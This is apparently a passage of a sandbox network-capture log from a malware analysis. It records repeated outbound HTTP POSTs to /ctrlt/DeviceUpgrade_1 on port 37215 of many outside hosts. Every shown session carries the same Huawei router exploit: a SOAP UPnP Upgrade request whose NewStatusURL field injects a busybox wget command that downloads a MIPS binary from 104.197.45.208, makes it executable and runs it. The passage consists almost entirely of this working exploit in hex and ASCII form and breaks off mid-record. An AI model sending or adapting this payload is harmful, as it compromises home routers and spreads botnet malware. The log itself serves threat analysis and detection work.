                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            109192.168.2.1447616156.99.46.1837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663419008 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            110192.168.2.1448236156.235.113.15637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663450003 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            111192.168.2.1448720156.63.123.18237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663470030 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            112192.168.2.144437441.150.127.11037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663486004 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            113192.168.2.143987441.221.245.4537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663516998 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            114192.168.2.1438536197.164.90.8937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663546085 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            115192.168.2.1448016197.72.101.7837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663552999 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            116192.168.2.143507441.103.79.20037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663578987 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            117192.168.2.1452620197.55.64.737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663610935 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            118192.168.2.143388041.103.189.20537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663629055 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
